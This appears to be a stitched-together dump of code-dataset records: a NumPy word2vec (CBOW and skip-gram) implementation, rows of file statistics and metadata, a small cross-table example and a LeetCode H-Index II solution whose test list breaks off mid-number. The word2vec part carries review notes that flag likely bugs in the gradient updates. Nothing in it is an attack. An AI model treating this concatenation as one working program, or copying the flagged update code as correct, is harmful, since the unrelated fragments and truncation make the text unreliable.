        if save_path is not None:
            self.save_model(save_path)
    def train_one_epoch(self, dataset: Dataset, learning_rate: float):
        """Run one pass over `dataset`; return the average per-sample loss.

        NOTE(review): an empty dataset leaves steps == 0 and raises
        ZeroDivisionError on the final return.
        """
        steps, total_loss = 0, 0.0
        for steps, sample in enumerate(iter(dataset), start=1):
            context_tokens, target_token = sample
            loss = self.train_one_step(steps,context_tokens, target_token, learning_rate)
            total_loss += loss
            if steps % 10000 == 0:
                print(f"Step: {steps}. Avg. loss: {total_loss / steps: .2f}",file=self.log,flush=True)
        return total_loss / steps
    def train_one_step(self, step:int ,context_tokens: List[str], target_token: str, learning_rate: float) -> float:
        """
        Perform one SGD step: predict the center token from its context
        and update the embeddings in place.
        :param step: 1-based step index (currently unused in the body)
        :param context_tokens: List of tokens around the target token
        :param target_token: Target (center) token
        :param learning_rate: Learning rate of each step
        :return: loss of the target token
        """
        if self.hierarchical_softmax:
            """CBOW with hierarchical softmax"""
            # ==== Construct one-hot vectors ====
            context_ids = [self.vocab.token_to_idx(i) for i in context_tokens]
            input_onehot = np.array(list(map(lambda x: one_hot(len(self.vocab), x), context_ids)))
            # ==== Forward step ====
            assert input_onehot.shape[-1] == self.W1.shape[0]
            # Averaged context embeddings = the CBOW hidden layer.
            word_vector = input_onehot @ self.W1
            word_vector = np.average(word_vector, axis=0)
            target_id = self.vocab.token_to_idx(target_token)
            # Root-to-leaf Huffman path of the target; internal nodes carry
            # the trainable output vectors.
            target_path = self.tree.get_nodepath(target_id)
            context_vector = np.array([target_path[i].vector for i in range(len(target_path)-1)])
            # 0/1 branch decision recorded at each step down the tree.
            context_one_hot = np.array([0 if target_path[i + 1].direction == 0 else 1 for i in range(len(target_path) - 1)])
            logit = context_vector @ word_vector
            output = sigmoid(logit)
            # ==== Calculate loss ====
            # (-2*d+1)*output + d equals `output` when d == 0 and
            # `1 - output` when d == 1, i.e. the probability of the branch
            # actually taken; 1e-8 guards against log(0).
            loss = -np.sum(np.log((-2 * context_one_hot + 1) * output + context_one_hot + 1e-8))
            # ==== Update parameters ====
            self.W1[context_ids] -= learning_rate * ((output - 1 + context_one_hot) @ context_vector) / len(context_tokens)
            for j, node in enumerate(target_path):
                # NOTE(review): assumes only the final (leaf) node has
                # vector None; an earlier None node would misalign output[j]
                # with its node -- confirm against Huffman_tree.
                if target_path[j].vector is not None:
                    target_path[j].vector -= learning_rate * (output[j] - 1 + context_one_hot[j]) * word_vector
        elif self.negative_sampling:
            """CBOW with negative sampling"""
            # ==== Construct one-hot vectors ====
            context_ids = [self.vocab.token_to_idx(i) for i in context_tokens]
            input_onehot = np.array(list(map(lambda x: one_hot(len(self.vocab), x), context_ids)))
            # ==== Forward step ====
            assert input_onehot.shape[-1] == self.W1.shape[0]
            word_vector = input_onehot @ self.W1
            word_vector = np.average(word_vector, axis=0)
            target_id = self.vocab.token_to_idx(target_token)
            positive_logit = word_vector @ self.W2[target_id]
            negative_ids = self.sampler.sample(target_id)
            # Negated scores, so sigmoid() gives the probability that each
            # negative sample is correctly rejected.
            negative_logit = -self.W2[negative_ids] @ word_vector
            positive_output = sigmoid(positive_logit)
            negative_output = sigmoid(negative_logit)
            # ==== Calculate loss ====
            loss = -np.log(positive_output+1e-8)-np.sum(np.log(negative_output+1e-8))
            # ==== Update parameters ====
            self.W1[context_ids] -= learning_rate * ((positive_output-1) * self.W2[target_id]+(1-negative_output)@self.W2[negative_ids]) / len(context_ids)
            self.W2[target_id] -= learning_rate * (positive_output-1) * word_vector
            self.W2[negative_ids] -= learning_rate * np.outer(1-negative_output,word_vector)
        else:
            """naive CBOW"""
            # ==== Construct one-hot vectors ====
            context_ids = [self.vocab.token_to_idx(i) for i in context_tokens]
            input_onehot = np.array(list(map(lambda x: one_hot(len(self.vocab), x), context_ids)))
            # ==== Forward step ====
            assert input_onehot.shape[-1] == self.W1.shape[0]
            word_vector = input_onehot @ self.W1
            word_vector = np.average(word_vector, axis=0)
            logit = self.W2 @word_vector
            output = softmax(logit)
            # ==== Calculate loss ====
            target_id = self.vocab.token_to_idx(target_token)
            loss = -np.log(output[target_id]+1e-8)
            # ==== Update parameters ====
            target_one_hot = one_hot(len(self.vocab), target_id)
            # Cross-entropy gradient w.r.t. the averaged hidden vector,
            # shared across all context rows of W1.
            self.W1[context_ids] -= learning_rate * (output @ self.W2 - self.W2[target_id]) / len(context_ids)
            self.W2[:] -= learning_rate * np.outer(output - target_one_hot, word_vector)
        return loss
    def similarity(self, token1: str, token2: str):
        """ Calculate cosine similarity of token1 and token2 """
        v1 = self.W1[self.vocab.token_to_idx(token1)]
        v2 = self.W1[self.vocab.token_to_idx(token2)]
        v1 = v1 / np.linalg.norm(v1)
        v2 = v2 / np.linalg.norm(v2)
        return np.dot(v1, v2)
    def most_similar_tokens(self, token: str, n: int):
        """ Find the n words most similar to the given token.

        Returns (token, cosine similarity) pairs in descending order of
        similarity; the query token itself scores 1.0 and so appears in
        the results.
        """
        norm_W1 = self.W1 / np.linalg.norm(self.W1, axis=1, keepdims=True)
        idx = self.vocab.token_to_idx(token, warn=True)
        v = norm_W1[idx]
        cosine_similarity = np.dot(norm_W1, v)
        # indices of the n largest similarities, best first
        nbest_idx = np.argsort(cosine_similarity)[-n:][::-1]
        results = []
        for idx in nbest_idx:
            _token = self.vocab.idx_to_token(idx)
            results.append((_token, cosine_similarity[idx]))
        return results
    def save_model(self, path: str):
        """ Save model and vocabulary to `path` """
        os.makedirs(path, exist_ok=True)
        self.vocab.save_vocab(path)
        # Pickle file name mirrors the log file naming scheme.
        with open(join(path, "cbow"+("_hierarchical" if self.hierarchical_softmax else "")
                       +("_neg" if self.negative_sampling else "")+ ("_sub" if self.subsampling else "") + ".pkl"), "wb") as f:
            if self.hierarchical_softmax:
                param = {"W1": self.W1, "tree": self.tree}
            else:
                param = {"W1": self.W1, "W2": self.W2}
            pickle.dump(param, f)
        print(f"Save model to {path}",file=self.log,flush=True)
    @classmethod
    def load_model(cls, path: str, hierarchical_softmax:bool= False, negative_sampling:bool= False,
                   size:int=10, subsampling:bool= False, subsample_thr:float= 1e-3):
        """ Load model and vocabulary from `path`.

        The flags must match those used when the model was saved, since
        they select which pickle file is opened and which parameters are
        expected inside it.  NOTE: pickle.load is only safe on model
        files you created yourself.
        """
        vocab = Vocab.load_vocab(path)
        with open(join(path, "cbow" + ("_hierarchical" if hierarchical_softmax else "")
                       + ("_neg" if negative_sampling else "") + ("_sub" if subsampling else "") + ".pkl"), "rb") as f:
            param = pickle.load(f)
        if hierarchical_softmax:
            W1, tree = param["W1"], param["tree"]
            model = cls(vocab, W1.shape[1], hierarchical_softmax=hierarchical_softmax, negative_sampling=negative_sampling, size=size, subsampling=subsampling,subsample_thr=subsample_thr)
            model.W1, model.tree = W1, tree
        else:
            W1, W2 = param["W1"], param["W2"]
            model = cls(vocab, W1.shape[1], hierarchical_softmax=hierarchical_softmax, negative_sampling=negative_sampling, size=size, subsampling=subsampling,subsample_thr=subsample_thr)
            model.W1, model.W2 = W1, W2
        print(f"Load model from {path}")
        return model
class Skipgram:
    """Skip-gram word2vec implemented with plain NumPy.

    The center word's embedding predicts each surrounding word.  The
    output layer is a full softmax by default, or a Huffman tree
    (hierarchical softmax), or negative sampling.  Training progress is
    appended to a file under log/ whose name encodes the options.
    """
    def __init__(self, vocab: Vocab, vector_dim: int,hierarchical_softmax: bool=False, negative_sampling: bool=False, size: int=10, subsampling: bool=False, subsample_thr: float=1e-3):
        """
        :param vocab: vocabulary mapping tokens to integer ids and back
        :param vector_dim: dimensionality N of the word vectors
        :param hierarchical_softmax: use a Huffman-tree output layer
        :param negative_sampling: use negative sampling (only takes effect
            when hierarchical_softmax is False)
        :param size: number of negative samples drawn per positive example
        :param subsampling: enable frequent-word subsampling in the sampler
        :param subsample_thr: threshold for the subsampling heuristic
        """
        self.vocab = vocab
        self.vector_dim = vector_dim
        self.hierarchical_softmax = hierarchical_softmax
        self.negative_sampling = negative_sampling
        self.subsampling = subsampling
        self.subsample_thr = subsample_thr
        os.makedirs("log", exist_ok=True)
        # Log file name encodes the enabled options, e.g. log/skip-gram_neg.txt.
        self.log = open("log/skip-gram"+("_hierarchical" if self.hierarchical_softmax else "") + ("_neg" if self.negative_sampling else "")
                        + ("_sub" if self.subsampling else "") + ".txt","a+")
        self.W1 = np.random.uniform(-1, 1, (len(self.vocab), self.vector_dim)) # V x N input embedding matrix
        if self.hierarchical_softmax:
            # Output-side parameters live on the internal nodes of the tree.
            self.tree = Huffman_tree(self.vocab, dim=vector_dim)
        else:
            self.W2 = np.random.uniform(-1, 1, (len(self.vocab), self.vector_dim)) # V x N output embeddings (same shape as W1; previous "N x V" comment was wrong)
            if negative_sampling:
                self.sampler = NEG(vocab=self.vocab, alpha=0.75, size=size, subsampling=self.subsampling, subsample_thr=self.subsample_thr)
    def train(self, corpus: str, window_size: int, train_epoch: int, learning_rate: float, save_path: str = None):
        """Train on `corpus` for `train_epoch` epochs.

        Per-epoch loss and timing go to the log file; the model is saved
        once after the final epoch when `save_path` is given.
        """
        dataset = Dataset(corpus, window_size, "skip-gram")
        for epoch in range(1, train_epoch + 1):
            start_time = time.time()
            avg_loss = self.train_one_epoch(dataset, learning_rate)
            end_time = time.time()
            print(f"Epoch {epoch}, loss: {avg_loss:.2f}. Cost {(end_time - start_time) / 60:.1f} min",file=self.log,flush=True)
        if save_path is not None:
            self.save_model(save_path)
    def train_one_epoch(self, dataset: Dataset, learning_rate: float):
        """Run one pass over `dataset`; return the average per-sample loss.

        NOTE(review): the unpacked names suggest (contexts, target) but
        Skipgram.train_one_step expects (context_token, target_tokens);
        the positional call relies on the ordering Dataset uses in
        "skip-gram" mode -- confirm against utils.dataset.  An empty
        dataset leaves steps == 0 and raises ZeroDivisionError.
        """
        steps, total_loss = 0, 0.0
        for steps, sample in enumerate(iter(dataset), start=1):
            context_tokens, target_token = sample
            loss = self.train_one_step(context_tokens, target_token, learning_rate)
            total_loss += loss
            if steps % 10000 == 0:
                print(f"Step: {steps}. Avg. loss: {total_loss / steps: .2f}",file=self.log,flush=True)
        return total_loss / steps
    def train_one_step(self, context_token: str, target_tokens: List[str], learning_rate: float) -> float:
        """
        Perform one SGD step: predict each surrounding token from the
        center token and update the embeddings in place.
        :param context_token: Context (center) token
        :param target_tokens: List of target tokens around the context token
        :param learning_rate: Learning rate of each step
        :return: loss of the target token
        """
        if self.hierarchical_softmax:
            """skip-gram with hierarchical softmax"""
            # ==== Construct one-hot vectors ====
            context_id = self.vocab.token_to_idx(context_token)
            input_onehot = one_hot(len(self.vocab),context_id)
            # ==== Forward step ====
            assert input_onehot.shape[0] == self.W1.shape[0]
            # Embedding of the center word (the hidden layer).
            word_vector = input_onehot @ self.W1
            target_ids = [self.vocab.token_to_idx(i) for i in target_tokens]
            # One root-to-leaf Huffman path per target word.
            target_path = [self.tree.get_nodepath(i) for i in target_ids]
            loss = 0.0
            target_gradient = []
            for i,path in enumerate(target_path):
                gradient = []
                context_vector = np.array([path[i].vector for i in range(len(path)-1)])
                # 0/1 branch decision recorded at each step down the tree.
                context_one_hot = np.array([0 if path[i+1].direction==0 else 1 for i in range(len(path)-1)])
                logit = context_vector @ word_vector
                output = sigmoid(logit)
                # ==== Calculate loss ====
                # (-2*d+1)*output + d is the probability of the branch taken;
                # 1e-8 guards against log(0).
                loss += -np.sum(np.log((-2*context_one_hot + 1) * output + context_one_hot + 1e-8))/len(target_tokens)
                # ==== Update parameters ====
                # NOTE(review): this updates W1[target_ids[i]] while the other
                # two branches update W1[context_id] -- confirm which row is
                # intended for skip-gram input embeddings.
                self.W1[target_ids[i]] -= learning_rate * ((output - 1 + context_one_hot) @ context_vector)/len(target_tokens)
                for j, node in enumerate(path):
                    if path[j].vector is not None:
                        gradient.append((output[j] - 1 + context_one_hot[j]) * word_vector/len(target_tokens))
                target_gradient.append(gradient)
            # Node-vector updates are deferred so every target's forward pass
            # sees the same parameters.
            # NOTE(review): target_gradient[i] only holds entries for nodes
            # with non-None vectors, yet is indexed by the full-path index j;
            # this aligns only if None vectors occur solely at the path end --
            # confirm against Huffman_tree.
            for i, path in enumerate(target_path):
                for j, node in enumerate(path):
                    if path[j].vector is not None:
                        path[j].vector -= learning_rate * target_gradient[i][j]
        elif self.negative_sampling:
            """skip-gram with negative sampling"""
            # ==== Construct one-hot vectors ====
            context_id = self.vocab.token_to_idx(context_token)
            input_onehot = one_hot(len(self.vocab), context_id)
            # ==== Forward step ====
            assert input_onehot.shape[0] == self.W1.shape[0]
            word_vector = input_onehot @ self.W1
            target_ids = [self.vocab.token_to_idx(i) for i in target_tokens]
            loss = 0.0
            for i in target_ids:
                negative_ids = self.sampler.sample(i)
                positive_logit = word_vector @ self.W2[i]
                # Negated scores, so sigmoid() gives the probability that each
                # negative sample is correctly rejected.
                negative_logit = -self.W2[negative_ids] @ word_vector
                positive_output = sigmoid(positive_logit)
                negative_output = sigmoid(negative_logit)
                # ==== Calculate loss ====
                loss += (-np.log(positive_output+1e-8)-np.sum(np.log(negative_output+1e-8)))/len(target_ids)
                # ==== Update parameters ====
                self.W1[context_id] -= learning_rate*(self.W2[i]*(positive_output-1)+(1-negative_output)@self.W2[negative_ids])/len(target_tokens)
                self.W2[i] -= learning_rate*word_vector*(positive_output-1)/len(target_tokens)
                self.W2[negative_ids] -= learning_rate*np.outer(1-negative_output,word_vector)/len(target_tokens)
        else:
            """naive skip-gram"""
            # ==== Construct one-hot vectors ====
            context_id = self.vocab.token_to_idx(context_token)
            input_onehot = one_hot(len(self.vocab), context_id)
            # ==== Forward step ====
            assert input_onehot.shape[0] == self.W1.shape[0]
            word_vector = input_onehot @ self.W1
            logit = self.W2 @ word_vector
            output = softmax(logit)
            target_ids = [self.vocab.token_to_idx(i) for i in target_tokens]
            # ==== Calculate loss ====
            # Average cross-entropy over all target words in the window.
            loss = np.average(-np.log(output[target_ids]+1e-8))
            # ==== Update parameters ====
            W1_grad = np.zeros(self.W1.shape)
            W1_grad[context_id] += -np.average(self.W2[target_ids], axis=0) + output @ self.W2
            W2_grad = np.outer(output, word_vector)
            W2_grad[target_ids] -= np.expand_dims(word_vector, axis=0) / len(target_ids)
            assert list(W1_grad.shape) == list(self.W1.shape)
            assert list(W2_grad.shape) == list(self.W2.shape)
            self.W1[:] -= learning_rate * W1_grad
            self.W2[:] -= learning_rate * W2_grad
        return loss
    def similarity(self, token1: str, token2: str):
        """ Calculate cosine similarity of token1 and token2 """
        v1 = self.W1[self.vocab.token_to_idx(token1)]
        v2 = self.W1[self.vocab.token_to_idx(token2)]
        v1 = v1 / np.linalg.norm(v1)
        v2 = v2 / np.linalg.norm(v2)
        return np.dot(v1, v2)
    def most_similar_tokens(self, token: str, n: int):
        """ Find the n words most similar to the given token.

        Returns (token, cosine similarity) pairs in descending order of
        similarity; the query token itself scores 1.0 and so appears in
        the results.
        """
        norm_W1 = self.W1 / np.linalg.norm(self.W1, axis=1, keepdims=True)
        idx = self.vocab.token_to_idx(token, warn=True)
        v = norm_W1[idx]
        cosine_similarity = np.dot(norm_W1, v)
        # indices of the n largest similarities, best first
        nbest_idx = np.argsort(cosine_similarity)[-n:][::-1]
        results = []
        for idx in nbest_idx:
            _token = self.vocab.idx_to_token(idx)
            results.append((_token, cosine_similarity[idx]))
        return results
    def save_model(self, path: str):
        """ Save model and vocabulary to `path` """
        os.makedirs(path, exist_ok=True)
        self.vocab.save_vocab(path)
        # Pickle file name mirrors the log file naming scheme.
        with open(join(path, "skip-gram" + ("_hierarchical" if self.hierarchical_softmax else "")
                       + ("_neg" if self.negative_sampling else "") + ("_sub" if self.subsampling else "") + ".pkl"), "wb") as f:
            if self.hierarchical_softmax:
                param = {"W1": self.W1, "tree": self.tree}
            else:
                param = {"W1": self.W1, "W2": self.W2}
            pickle.dump(param, f)
        print(f"Save model to {path}",file=self.log,flush=True)
    @classmethod
    def load_model(cls, path: str, hierarchical_softmax:bool= False, negative_sampling:bool= False,
                   size:int= 10, subsampling:bool= False, subsample_thr:float= 1e-3):
        """ Load model and vocabulary from `path`.

        The flags must match those used when the model was saved, since
        they select which pickle file is opened and which parameters are
        expected inside it.  NOTE: pickle.load is only safe on model
        files you created yourself.
        """
        vocab = Vocab.load_vocab(path)
        with open(join(path, "skip-gram" + ("_hierarchical" if hierarchical_softmax else "")
                       + ("_neg" if negative_sampling else "") + ("_sub" if subsampling else "") + ".pkl"), "rb") as f:
            param = pickle.load(f)
        if hierarchical_softmax:
            W1, tree = param["W1"], param["tree"]
            model = cls(vocab, W1.shape[1], hierarchical_softmax=hierarchical_softmax, negative_sampling=negative_sampling, size=size, subsampling=subsampling, subsample_thr=subsample_thr)
            model.W1, model.tree = W1, tree
        else:
            W1, W2 = param["W1"], param["W2"]
            model = cls(vocab, W1.shape[1], hierarchical_softmax=hierarchical_softmax, negative_sampling=negative_sampling, size=size, subsampling=subsampling, subsample_thr=subsample_thr)
            model.W1, model.W2 = W1, W2
        print(f"Load model from {path}")
        return model
| 49.977556
| 188
| 0.60486
| 2,621
| 20,041
| 4.435712
| 0.075544
| 0.031739
| 0.021676
| 0.024772
| 0.853604
| 0.824531
| 0.808791
| 0.805866
| 0.777482
| 0.755978
| 0
| 0.019502
| 0.270795
| 20,041
| 401
| 189
| 49.977556
| 0.776037
| 0.08757
| 0
| 0.711864
| 0
| 0.00678
| 0.0342
| 0
| 0
| 0
| 0
| 0
| 0.027119
| 1
| 0.064407
| false
| 0
| 0.033898
| 0
| 0.149153
| 0.027119
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74b9d8ce2df4d8b8b944d3e7197504e0339b9aec
| 292
|
py
|
Python
|
concepts/_example.py
|
plpedrofeitosa/concepts
|
df1c4e139fef0f7ccff466f9c27024f6b7b4d1ef
|
[
"MIT"
] | 90
|
2015-03-24T20:09:14.000Z
|
2022-03-18T07:37:01.000Z
|
concepts/_example.py
|
plpedrofeitosa/concepts
|
df1c4e139fef0f7ccff466f9c27024f6b7b4d1ef
|
[
"MIT"
] | 18
|
2017-11-03T18:08:13.000Z
|
2022-02-05T10:10:24.000Z
|
concepts/_example.py
|
plpedrofeitosa/concepts
|
df1c4e139fef0f7ccff466f9c27024f6b7b4d1ef
|
[
"MIT"
] | 27
|
2015-01-23T13:00:57.000Z
|
2022-03-08T15:48:41.000Z
|
# Pipe-delimited cross table: each row is an object (person/number
# combination like "1sg"), each column an attribute (+1, -1, ..., -pl),
# and an "X" cell marks that the row's object carries that attribute.
EXAMPLE = '''\
|+1|-1|+2|-2|+3|-3|+sg|+pl|-sg|-pl|
1sg| X| | | X| | X| X| | | X|
1pl| X| | | X| | X| | X| X| |
2sg| | X| X| | | X| X| | | X|
2pl| | X| X| | | X| | X| X| |
3sg| | X| | X| X| | X| | | X|
3pl| | X| | X| X| | | X| X| |
'''
| 29.2
| 38
| 0.236301
| 47
| 292
| 1.468085
| 0.276596
| 0.695652
| 0.782609
| 0.695652
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 0.438356
| 292
| 9
| 39
| 32.444444
| 0.347561
| 0
| 0
| 0
| 0
| 0.111111
| 0.941781
| 0.119863
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d082f2b740d66d6a84e06f463e5ebb540865fec
| 29,655
|
py
|
Python
|
src/275. H-Index II.py
|
xiaonanln/myleetcode-python
|
95d282f21a257f937cd22ef20c3590a69919e307
|
[
"Apache-2.0"
] | null | null | null |
src/275. H-Index II.py
|
xiaonanln/myleetcode-python
|
95d282f21a257f937cd22ef20c3590a69919e307
|
[
"Apache-2.0"
] | null | null | null |
src/275. H-Index II.py
|
xiaonanln/myleetcode-python
|
95d282f21a257f937cd22ef20c3590a69919e307
|
[
"Apache-2.0"
] | null | null | null |
class Solution(object):
    """LeetCode 275, H-Index II: citations are sorted in ascending order."""

    def hIndex(self, citations):
        """Return the h-index of a paper list with ascending citation counts.

        :type citations: List[int]
        :rtype: int

        Binary-searches candidate h values in ``[1, len(citations)]``,
        giving the O(log n) runtime the problem requires.  ``h = m`` holds
        exactly when the m-th paper from the end has >= m citations and
        the (m+1)-th from the end has <= m.
        """
        total = len(citations)
        # No papers, or even the most-cited paper has zero citations.
        if total == 0 or citations[-1] == 0:
            return 0
        lo, hi = 1, total
        while lo < hi:
            mid = (lo + hi) // 2
            at_mid = citations[total - mid]
            if at_mid == mid or (at_mid > mid and citations[total - mid - 1] <= mid):
                return mid
            if at_mid < mid:
                # Fewer than mid papers have >= mid citations.
                hi = mid - 1
            else:
                # More than mid papers have > mid citations, so h > mid.
                lo = mid + 1
        return lo
# print Solution().hIndex([4, 4, 0, 0])
cits = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,
10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16
,16,16,16,16,16,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,19,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,2